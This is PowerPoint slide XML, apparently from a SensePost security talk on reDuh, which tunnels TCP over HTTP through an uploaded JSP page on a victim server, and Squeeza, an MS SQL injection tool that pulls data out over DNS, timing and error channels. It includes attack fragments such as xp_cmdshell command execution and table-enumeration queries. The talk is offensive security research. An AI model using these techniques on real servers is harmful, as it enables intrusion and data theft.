              <a:t>Specialist Security firm based in South Africa;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Customers all over the globe;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Talks / Papers / Books </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>haroon,marco}@sensepost.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spend most of our time breaking stuff ((thinking about breaking stuff) or playing foosball!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What this talk is about ? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>(Hint: not foosball!)</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reader_2.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-7302" r="-7302"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>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Startup Proxy / Startup JSP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="reader_3.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-11122" r="-11122"/>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RDP Client to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>localproxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="reader_4.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-10606" r="-10606"/>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Localproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;-&gt; Base64 &lt;-&gt; JSP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="reader_5.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-10606" r="-10606"/>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Localproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;-&gt; Base64 &lt;-&gt; JSP &lt;-&gt; RDP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="reader_6.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-11122" r="-11122"/>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ReDuh.jsp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Written by Glenn Wilkinson (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>glenn@sensepost.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upload / Create .JSP page on server (http://ubuntoo.victim.com:8080/upload/reDuh.jsp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fire-up local proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tell web-page to create web-bridge to internal_host:3389</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JSP creates socket to internal_host:3389</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JSP creates queues to handle internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>comms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker aims RDC client at local proxy on 127.0.0.1:1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local endpoint accepts traffic, converts packets to base-64 encoded POST messages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Packets are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to .JSP page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JSP Page decodes packets, queues for delivery via created socket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Return traffic is queued, encoded as base64 and queued again.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Proxy polls server for return packet data, recreates them as packets and re-feeds the local socket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>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this means..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have a simple TCP over HTTP/HTTPS implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It requires the creation of a simple, single  .JSP file on the target..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Surely this isn’t .JSP specific ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ian@sensepost.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ported this while cursing a lot to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ASP.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>gert@sensepost.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> gave us the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> version.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Charl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &amp; Nick drew cool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>visios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basically covers most of the common cases.. If we can create a web page, we can create a circuit..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Squeeza</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Released at BH USA 2007</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Advanced SQL injection tool (another one on the pile…), aimed at MS SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Treated injection slightly differently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Split content generation from return channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Content generation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Supported multiple return channels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Could mostly mix ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> match  content generation modes with return channels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Squeeza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Content created (not the interesting part)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command execution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (old faithful)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data extraction: select name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=‘U’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File download: bulk insert … from ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>c:\blah.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Return channels (more interesting part)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Timing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP Error-based (ala </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Automagic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> SQL Injector)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Return channels NOT supported</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inline HTML extraction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Standard blind injection techniques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Squeeza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> process overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Down Arrow Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="1592594"/>
            <a:ext cx="6019800" cy="1074406"/>
          </a:xfrm>
          <a:prstGeom prst="downArrowCallou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Generate content using command execution, file copy or data extraction injection string</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Down Arrow Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2667000"/>
            <a:ext cx="6019800" cy="1074406"/>
          </a:xfrm>
          <a:prstGeom prst="downArrowCallout">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US" dirty="0" smtClean="0"/>
              <a:t>Store data in a temporary table inside SQL database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3741406"/>
            <a:ext cx="6019800" cy="678194"/>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Extract data using return channel of choice: DNS, timing, SQL error messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="4648200"/>
            <a:ext cx="6629400"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smtClean="0"/>
              <a:t>Not fast enough for real-time applications, but good enough for batch applications such as command execution, file copy etc. Don’t expect to relay VNC traffic (well, not yet…).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A progression of Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="884237"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A brief trip to the past (1601-1990)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Un-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>firewalled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> access to victim host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And also un-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>firewalled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to rest of the network! </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a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Picture 2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2095876" y="2094158"/>
            <a:ext cx="5066924" cy="1411042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx2">
                <a:alpha val="75000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Picture 4.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="4325701"/>
            <a:ext cx="3612813" cy="2303699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent1">
                <a:alpha val="75000"/>
              </a:schemeClr>
            </a:glo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Squeeza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: DNS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>Weaponised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> SQL server content extraction through DNS queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Data broken up into chunks, encoded and emitted through DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Which meant:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Entire DNS channel handled in SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Elevated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>privs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> not required (but used if available)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Provided reliability guarantees, since client had complete control over what was requested and received</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Compare to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLNinja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> (awesome tool, DNS not so much)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>requires binary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>upload+cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>reliability guarantee is ‘try again’, as client can’t control remote binary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>however, does provide own ‘fake’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> server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Can 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848467" y="1283732"/>
            <a:ext cx="559065" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="can">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a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Temp table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="attacker-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1701800"/>
            <a:ext cx="1130300" cy="1003300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="server-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239000" y="1536700"/>
            <a:ext cx="889000" cy="1168400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2705100"/>
            <a:ext cx="1447800" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="2705100"/>
            <a:ext cx="1447800" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim WWW/SQL Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="firewall-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4735513" y="1283732"/>
            <a:ext cx="939800" cy="1790700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Right Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2044700" y="1701800"/>
            <a:ext cx="5346700" cy="74930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exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ipconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /all’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
